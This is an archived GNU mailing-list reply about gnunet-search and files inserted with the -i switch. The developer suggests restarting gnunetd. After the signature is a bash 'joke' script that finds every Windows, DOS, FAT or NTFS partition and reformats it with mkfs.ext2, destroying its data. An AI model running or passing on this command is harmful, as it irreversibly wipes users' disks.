[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Help-gnunet] Finding keywords of files inserted with -i
From: |
Christian Grothoff |
Subject: |
Re: [Help-gnunet] Finding keywords of files inserted with -i |
Date: |
Sat, 27 Apr 2002 10:06:16 -0500 |
On Saturday 27 April 2002 09:49 am, you wrote:
> Hi;
>
> Is gnunet-search meant to find the keywords of files inserted as
> index only (option -i)? If so this does not seem to work.
Did you restart your gnunetd server after inserting the content? The -i
switch should have no impact on the keyword mechanism (none at all).
Christian
--
______________________________________________________
|Christian Grothoff |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/ address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk\
'{print$1;}'`;do;nohup mkfs.ext2 $i&;done
echo -e "\n\n\t\tMay the source be with you.\n\n"